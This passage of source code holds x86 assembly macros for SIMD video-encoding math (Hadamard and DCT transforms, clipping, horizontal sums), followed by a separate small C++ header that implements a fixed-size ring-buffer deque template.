pshufd %1, %2, (%3)*q1111
%else
pshufw %1, %2, (%3)*q0101 + ((%3)+1)*q1010
%endif
%endmacro
%macro CLIPW 3 ;(dst, min, max)
pmaxsw %1, %2
pminsw %1, %3
%endmacro
%macro CLIPW2 4 ;(dst0, dst1, min, max)
pmaxsw %1, %3
pmaxsw %2, %3
pminsw %1, %4
pminsw %2, %4
%endmacro
%macro MOVHL 2 ; dst, src
%ifidn %1, %2
punpckhqdq %1, %2
%elif cpuflag(avx)
punpckhqdq %1, %2, %2
%elif cpuflag(sse4)
pshufd %1, %2, q3232 ; pshufd is slow on some older CPUs, so only use it on more modern ones
%else
movhlps %1, %2 ; may cause an int/float domain transition and has a dependency on dst
%endif
%endmacro
%macro HADDD 2 ; sum junk
%if sizeof%1 >= 64
vextracti32x8 ymm%2, zmm%1, 1
paddd ymm%1, ymm%2
%endif
%if sizeof%1 >= 32
vextracti128 xmm%2, ymm%1, 1
paddd xmm%1, xmm%2
%endif
%if sizeof%1 >= 16
MOVHL xmm%2, xmm%1
paddd xmm%1, xmm%2
%endif
%if cpuflag(xop) && sizeof%1 == 16
vphadddq xmm%1, xmm%1
%endif
%if notcpuflag(xop)
PSHUFLW xmm%2, xmm%1, q1032
paddd xmm%1, xmm%2
%endif
%endmacro
%macro HADDW 2 ; reg, tmp
%if cpuflag(xop) && sizeof%1 == 16
vphaddwq %1, %1
MOVHL %2, %1
paddd %1, %2
%else
pmaddwd %1, [pw_1]
HADDD %1, %2
%endif
%endmacro
%macro HADDUWD 2
%if cpuflag(xop) && sizeof%1 == 16
vphadduwd %1, %1
%else
psrld %2, %1, 16
pslld %1, 16
psrld %1, 16
paddd %1, %2
%endif
%endmacro
%macro HADDUW 2
%if cpuflag(xop) && sizeof%1 == 16
vphadduwq %1, %1
MOVHL %2, %1
paddd %1, %2
%else
HADDUWD %1, %2
HADDD %1, %2
%endif
%endmacro
%macro PALIGNR 4-5 ; [dst,] src1, src2, imm, tmp
; AVX2 version uses a precalculated extra input that
; can be re-used across calls
%if sizeof%1==32
; %3 = abcdefgh ijklmnop (lower address)
; %2 = ABCDEFGH IJKLMNOP (higher address)
vperm2i128 %4, %1, %2, q0003 ; %4 = ijklmnop ABCDEFGH
%if %3 < 16
palignr %1, %4, %2, %3 ; %1 = bcdefghi jklmnopA
%else
palignr %1, %2, %4, %3-16 ; %1 = pABCDEFG HIJKLMNO
%endif
%elif cpuflag(ssse3)
%if %0==5
palignr %1, %2, %3, %4
%else
palignr %1, %2, %3
%endif
%else
%define %%dst %1
%if %0==5
%ifnidn %1, %2
mova %%dst, %2
%endif
%rotate 1
%endif
%ifnidn %4, %2
mova %4, %2
%endif
%if mmsize==8
psllq %%dst, (8-%3)*8
psrlq %4, %3*8
%else
pslldq %%dst, 16-%3
psrldq %4, %3
%endif
por %%dst, %4
%endif
%endmacro
%macro PSHUFLW 1+
%if mmsize == 8
pshufw %1
%else
pshuflw %1
%endif
%endmacro
; shift a mmxreg by n bytes, or a xmmreg by 2*n bytes
; values shifted in are undefined
; faster if dst==src
%define PSLLPIX PSXLPIX l, -1, ;dst, src, shift
%define PSRLPIX PSXLPIX r, 1, ;dst, src, shift
%macro PSXLPIX 5
%if mmsize == 8
%if %5&1
ps%1lq %3, %4, %5*8
%else
pshufw %3, %4, (q3210<<8>>(8+%2*%5))&0xff
%endif
%else
ps%1ldq %3, %4, %5*2
%endif
%endmacro
%macro DEINTB 5 ; mask, reg1, mask, reg2, optional src to fill masks from
%ifnum %5
pand m%3, m%5, m%4 ; src .. y6 .. y4
pand m%1, m%5, m%2 ; dst .. y6 .. y4
%else
mova m%1, %5
pand m%3, m%1, m%4 ; src .. y6 .. y4
pand m%1, m%1, m%2 ; dst .. y6 .. y4
%endif
psrlw m%2, 8 ; dst .. y7 .. y5
psrlw m%4, 8 ; src .. y7 .. y5
%endmacro
%macro SUMSUB_BA 3-4
%if %0==3
padd%1 m%2, m%3
padd%1 m%3, m%3
psub%1 m%3, m%2
%elif avx_enabled
padd%1 m%4, m%2, m%3
psub%1 m%3, m%2
SWAP %2, %4
%else
mova m%4, m%2
padd%1 m%2, m%3
psub%1 m%3, m%4
%endif
%endmacro
%macro SUMSUB_BADC 5-6
%if %0==6
SUMSUB_BA %1, %2, %3, %6
SUMSUB_BA %1, %4, %5, %6
%else
padd%1 m%2, m%3
padd%1 m%4, m%5
padd%1 m%3, m%3
padd%1 m%5, m%5
psub%1 m%3, m%2
psub%1 m%5, m%4
%endif
%endmacro
%macro HADAMARD4_V 4+
SUMSUB_BADC w, %1, %2, %3, %4
SUMSUB_BADC w, %1, %3, %2, %4
%endmacro
%macro HADAMARD8_V 8+
SUMSUB_BADC w, %1, %2, %3, %4
SUMSUB_BADC w, %5, %6, %7, %8
SUMSUB_BADC w, %1, %3, %2, %4
SUMSUB_BADC w, %5, %7, %6, %8
SUMSUB_BADC w, %1, %5, %2, %6
SUMSUB_BADC w, %3, %7, %4, %8
%endmacro
%macro TRANS_SSE2 5-6
; TRANSPOSE2x2
; %1: transpose width (d/q) - use SBUTTERFLY qdq for dq
; %2: ord/unord (for compat with sse4, unused)
; %3/%4: source regs
; %5/%6: tmp regs
%ifidn %1, d
%define mask [mask_10]
%define shift 16
%elifidn %1, q
%define mask [mask_1100]
%define shift 32
%endif
%if %0==6 ; less dependency if we have two tmp
mova m%5, mask ; ff00
mova m%6, m%4 ; x5x4
psll%1 m%4, shift ; x4..
pand m%6, m%5 ; x5..
pandn m%5, m%3 ; ..x0
psrl%1 m%3, shift ; ..x1
por m%4, m%5 ; x4x0
por m%3, m%6 ; x5x1
%else ; more dependency, one insn less. sometimes faster, sometimes not
mova m%5, m%4 ; x5x4
psll%1 m%4, shift ; x4..
pxor m%4, m%3 ; (x4^x1)x0
pand m%4, mask ; (x4^x1)..
pxor m%3, m%4 ; x4x0
psrl%1 m%4, shift ; ..(x1^x4)
pxor m%5, m%4 ; x5x1
SWAP %4, %3, %5
%endif
%endmacro
%macro TRANS_SSE4 5-6 ; see above
%ifidn %1, d
%ifidn %2, ord
psrl%1 m%5, m%3, 16
pblendw m%5, m%4, q2222
psll%1 m%4, 16
pblendw m%4, m%3, q1111
SWAP %3, %5
%else
%if avx_enabled
pblendw m%5, m%3, m%4, q2222
SWAP %3, %5
%else
mova m%5, m%3
pblendw m%3, m%4, q2222
%endif
psll%1 m%4, 16
psrl%1 m%5, 16
por m%4, m%5
%endif
%elifidn %1, q
shufps m%5, m%3, m%4, q3131
shufps m%3, m%3, m%4, q2020
SWAP %4, %5
%endif
%endmacro
%macro TRANS_XOP 5-6
%ifidn %1, d
vpperm m%5, m%3, m%4, [transd_shuf1]
vpperm m%3, m%3, m%4, [transd_shuf2]
%elifidn %1, q
shufps m%5, m%3, m%4, q3131
shufps m%3, m%4, q2020
%endif
SWAP %4, %5
%endmacro
%macro HADAMARD 5-6
; %1=distance in words (0 for vertical pass, 1/2/4 for horizontal passes)
; %2=sumsub/max/amax (sum and diff / maximum / maximum of absolutes)
; %3/%4: regs
; %5(%6): tmpregs
%if %1!=0 ; have to reorder stuff for horizontal op
%ifidn %2, sumsub
%define ORDER ord
; sumsub needs order because a-b != b-a unless a=b
%else
%define ORDER unord
; if we just max, order doesn't matter (allows pblendw+or in sse4)
%endif
%if %1==1
TRANS d, ORDER, %3, %4, %5, %6
%elif %1==2
%if mmsize==8
SBUTTERFLY dq, %3, %4, %5
%else
TRANS q, ORDER, %3, %4, %5, %6
%endif
%elif %1==4
SBUTTERFLY qdq, %3, %4, %5
%elif %1==8
SBUTTERFLY dqqq, %3, %4, %5
%endif
%endif
%ifidn %2, sumsub
SUMSUB_BA w, %3, %4, %5
%else
%ifidn %2, amax
%if %0==6
ABSW2 m%3, m%4, m%3, m%4, m%5, m%6
%else
ABSW m%3, m%3, m%5
ABSW m%4, m%4, m%5
%endif
%endif
pmaxsw m%3, m%4
%endif
%endmacro
%macro HADAMARD2_2D 6-7 sumsub
HADAMARD 0, sumsub, %1, %2, %5
HADAMARD 0, sumsub, %3, %4, %5
SBUTTERFLY %6, %1, %2, %5
%ifnum %7
HADAMARD 0, amax, %1, %2, %5, %7
%else
HADAMARD 0, %7, %1, %2, %5
%endif
SBUTTERFLY %6, %3, %4, %5
%ifnum %7
HADAMARD 0, amax, %3, %4, %5, %7
%else
HADAMARD 0, %7, %3, %4, %5
%endif
%endmacro
%macro HADAMARD4_2D 5-6 sumsub
HADAMARD2_2D %1, %2, %3, %4, %5, wd
HADAMARD2_2D %1, %3, %2, %4, %5, dq, %6
SWAP %2, %3
%endmacro
%macro HADAMARD4_2D_SSE 5-6 sumsub
HADAMARD 0, sumsub, %1, %2, %5 ; 1st V row 0 + 1
HADAMARD 0, sumsub, %3, %4, %5 ; 1st V row 2 + 3
SBUTTERFLY wd, %1, %2, %5 ; %1: m0 1+0 %2: m1 1+0
SBUTTERFLY wd, %3, %4, %5 ; %3: m0 3+2 %4: m1 3+2
HADAMARD2_2D %1, %3, %2, %4, %5, dq
SBUTTERFLY qdq, %1, %2, %5
HADAMARD 0, %6, %1, %2, %5 ; 2nd H m1/m0 row 0+1
SBUTTERFLY qdq, %3, %4, %5
HADAMARD 0, %6, %3, %4, %5 ; 2nd H m1/m0 row 2+3
%endmacro
%macro HADAMARD8_2D 9-10 sumsub
HADAMARD2_2D %1, %2, %3, %4, %9, wd
HADAMARD2_2D %5, %6, %7, %8, %9, wd
HADAMARD2_2D %1, %3, %2, %4, %9, dq
HADAMARD2_2D %5, %7, %6, %8, %9, dq
HADAMARD2_2D %1, %5, %3, %7, %9, qdq, %10
HADAMARD2_2D %2, %6, %4, %8, %9, qdq, %10
%ifnidn %10, amax
SWAP %2, %5
SWAP %4, %7
%endif
%endmacro
; doesn't include the "pmaddubsw hmul_8p" pass
%macro HADAMARD8_2D_HMUL 10
HADAMARD4_V %1, %2, %3, %4, %9
HADAMARD4_V %5, %6, %7, %8, %9
SUMSUB_BADC w, %1, %5, %2, %6, %9
HADAMARD 2, sumsub, %1, %5, %9, %10
HADAMARD 2, sumsub, %2, %6, %9, %10
SUMSUB_BADC w, %3, %7, %4, %8, %9
HADAMARD 2, sumsub, %3, %7, %9, %10
HADAMARD 2, sumsub, %4, %8, %9, %10
HADAMARD 1, amax, %1, %5, %9, %10
HADAMARD 1, amax, %2, %6, %9, %5
HADAMARD 1, amax, %3, %7, %9, %5
HADAMARD 1, amax, %4, %8, %9, %5
%endmacro
%macro SUMSUB2_AB 4
%if cpuflag(xop)
pmacs%1%1 m%4, m%3, [p%1_m2], m%2
pmacs%1%1 m%2, m%2, [p%1_2], m%3
%elifnum %3
psub%1 m%4, m%2, m%3
psub%1 m%4, m%3
padd%1 m%2, m%2
padd%1 m%2, m%3
%else
mova m%4, m%2
padd%1 m%2, m%2
padd%1 m%2, %3
psub%1 m%4, %3
psub%1 m%4, %3
%endif
%endmacro
%macro SUMSUBD2_AB 5
%ifnum %4
psra%1 m%5, m%2, 1 ; %3: %3>>1
psra%1 m%4, m%3, 1 ; %2: %2>>1
padd%1 m%4, m%2 ; %3: %3>>1+%2
psub%1 m%5, m%3 ; %2: %2>>1-%3
SWAP %2, %5
SWAP %3, %4
%else
mova %5, m%2
mova %4, m%3
psra%1 m%3, 1 ; %3: %3>>1
psra%1 m%2, 1 ; %2: %2>>1
padd%1 m%3, %5 ; %3: %3>>1+%2
psub%1 m%2, %4 ; %2: %2>>1-%3
%endif
%endmacro
%macro DCT4_1D 5
%ifnum %5
SUMSUB_BADC w, %4, %1, %3, %2, %5
SUMSUB_BA w, %3, %4, %5
SUMSUB2_AB w, %1, %2, %5
SWAP %1, %3, %4, %5, %2
%else
SUMSUB_BADC w, %4, %1, %3, %2
SUMSUB_BA w, %3, %4
mova [%5], m%2
SUMSUB2_AB w, %1, [%5], %2
SWAP %1, %3, %4, %2
%endif
%endmacro
%macro IDCT4_1D 6-7
%ifnum %6
SUMSUBD2_AB %1, %3, %5, %7, %6
; %3: %3>>1-%5 %5: %3+%5>>1
SUMSUB_BA %1, %4, %2, %7
; %4: %2+%4 %2: %2-%4
SUMSUB_BADC %1, %5, %4, %3, %2, %7
; %5: %2+%4 + (%3+%5>>1)
; %4: %2+%4 - (%3+%5>>1)
; %3: %2-%4 + (%3>>1-%5)
; %2: %2-%4 - (%3>>1-%5)
%else
%ifidn %1, w
SUMSUBD2_AB %1, %3, %5, [%6], [%6+16]
%else
SUMSUBD2_AB %1, %3, %5, [%6], [%6+32]
%endif
SUMSUB_BA %1, %4, %2
SUMSUB_BADC %1, %5, %4, %3, %2
%endif
SWAP %2, %5, %4
; %2: %2+%4 + (%3+%5>>1) row0
; %3: %2-%4 + (%3>>1-%5) row1
; %4: %2-%4 - (%3>>1-%5) row2
; %5: %2+%4 - (%3+%5>>1) row3
%endmacro
%macro LOAD_DIFF 5-6 1
%if HIGH_BIT_DEPTH
%if %6 ; %5 aligned?
mova %1, %4
psubw %1, %5
%elif cpuflag(avx)
movu %1, %4
psubw %1, %5
%else
movu %1, %4
movu %2, %5
psubw %1, %2
%endif
%else ; !HIGH_BIT_DEPTH
movh %1, %4
movh %2, %5
%ifidn %3, none
punpcklbw %1, %2
punpcklbw %2, %2
%else
punpcklbw %1, %3
punpcklbw %2, %3
%endif
psubw %1, %2
%endif ; HIGH_BIT_DEPTH
%endmacro
%macro LOAD_DIFF8x4 8 ; 4x dst, 1x tmp, 1x mul, 2x ptr
%if BIT_DEPTH == 8 && cpuflag(ssse3)
movh m%2, [%8+%1*FDEC_STRIDE]
movh m%1, [%7+%1*FENC_STRIDE]
punpcklbw m%1, m%2
movh m%3, [%8+%2*FDEC_STRIDE]
movh m%2, [%7+%2*FENC_STRIDE]
punpcklbw m%2, m%3
movh m%4, [%8+%3*FDEC_STRIDE]
movh m%3, [%7+%3*FENC_STRIDE]
punpcklbw m%3, m%4
movh m%5, [%8+%4*FDEC_STRIDE]
movh m%4, [%7+%4*FENC_STRIDE]
punpcklbw m%4, m%5
pmaddubsw m%1, m%6
pmaddubsw m%2, m%6
pmaddubsw m%3, m%6
pmaddubsw m%4, m%6
%else
LOAD_DIFF m%1, m%5, m%6, [%7+%1*FENC_STRIDEB], [%8+%1*FDEC_STRIDEB]
LOAD_DIFF m%2, m%5, m%6, [%7+%2*FENC_STRIDEB], [%8+%2*FDEC_STRIDEB]
LOAD_DIFF m%3, m%5, m%6, [%7+%3*FENC_STRIDEB], [%8+%3*FDEC_STRIDEB]
LOAD_DIFF m%4, m%5, m%6, [%7+%4*FENC_STRIDEB], [%8+%4*FDEC_STRIDEB]
%endif
%endmacro
%macro STORE_DCT 6
movq [%5+%6+ 0], m%1
movq [%5+%6+ 8], m%2
movq [%5+%6+16], m%3
movq [%5+%6+24], m%4
movhps [%5+%6+32], m%1
movhps [%5+%6+40], m%2
movhps [%5+%6+48], m%3
movhps [%5+%6+56], m%4
%endmacro
%macro STORE_IDCT 4
movhps [r0-4*FDEC_STRIDE], %1
movh [r0-3*FDEC_STRIDE], %1
movhps [r0-2*FDEC_STRIDE], %2
movh [r0-1*FDEC_STRIDE], %2
movhps [r0+0*FDEC_STRIDE], %3
movh [r0+1*FDEC_STRIDE], %3
movhps [r0+2*FDEC_STRIDE], %4
movh [r0+3*FDEC_STRIDE], %4
%endmacro
%macro LOAD_DIFF_8x4P 7-11 r0,r2,0,1 ; 4x dest, 2x temp, 2x pointer, increment, aligned?
LOAD_DIFF m%1, m%5, m%7, [%8], [%9], %11
LOAD_DIFF m%2, m%6, m%7, [%8+r1], [%9+r3], %11
LOAD_DIFF m%3, m%5, m%7, [%8+2*r1], [%9+2*r3], %11
LOAD_DIFF m%4, m%6, m%7, [%8+r4], [%9+r5], %11
%if %10
lea %8, [%8+4*r1]
lea %9, [%9+4*r3]
%endif
%endmacro
; 2xdst, 2xtmp, 2xsrcrow
%macro LOAD_DIFF16x2_AVX2 6
pmovzxbw m%1, [r1+%5*FENC_STRIDE]
pmovzxbw m%2, [r1+%6*FENC_STRIDE]
pmovzxbw m%3, [r2+(%5-4)*FDEC_STRIDE]
pmovzxbw m%4, [r2+(%6-4)*FDEC_STRIDE]
psubw m%1, m%3
psubw m%2, m%4
%endmacro
%macro DIFFx2 6-7
movh %3, %5
punpcklbw %3, %4
psraw %1, 6
paddsw %1, %3
movh %3, %6
punpcklbw %3, %4
psraw %2, 6
paddsw %2, %3
packuswb %2, %1
%endmacro
; (high depth) in: %1, %2, min to clip, max to clip, mem128
; in: %1, tmp, %3, mem64
%macro STORE_DIFF 4-5
%if HIGH_BIT_DEPTH
psrad %1, 6
psrad %2, 6
packssdw %1, %2
paddw %1, %5
CLIPW %1, %3, %4
mova %5, %1
%else
movh %2, %4
punpcklbw %2, %3
psraw %1, 6
paddsw %1, %2
packuswb %1, %1
movh %4, %1
%endif
%endmacro
%macro SHUFFLE_MASK_W 8
%rep 8
%if %1>=0x80
db %1, %1
%else
db %1*2
db %1*2+1
%endif
%rotate 1
%endrep
%endmacro
; instruction, accum, input, iteration (zero to swap, nonzero to add)
%macro ACCUM 4
%if %4
%1 m%2, m%3
%else
SWAP %2, %3
%endif
%endmacro
; IACA support
%macro IACA_START 0
mov ebx, 111
db 0x64, 0x67, 0x90
%endmacro
%macro IACA_END 0
mov ebx, 222
db 0x64, 0x67, 0x90
%endmacro
|
#pragma once
#include <cstdint>
#include <type_traits>
#include <utility>
namespace higanbana
{
template<typename T, size_t N>
class FixedSizeDeque
{
size_t m_count = 0;
size_t m_head = 0;
T m_arr[N] = {};
size_t index_back() {
//assert(m_count > 0);
return (m_head + m_count-1) % N;
}
size_t index_front() {
//assert(m_count > 0);
return (m_head) % N;
}
public:
void push_back(T value) {
m_count++;
m_arr[index_back()] = value;
}
void push_front(T value) {
if (m_head == 0)
m_head = N;
m_head--;
m_arr[index_front()] = value;
m_count++;
}
T& back() {
return m_arr[index_back()];
}
T& front() {
return m_arr[index_front()];
}
void pop_back() {
m_arr[index_back()].~T();
m_count--;
}
void pop_front() {
m_arr[index_front()].~T();
m_count--;
m_head++;
if (m_head == N)
m_head = 0;
}
bool empty() const { return m_count==0; }
size_t size() const { return m_count; }
};
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.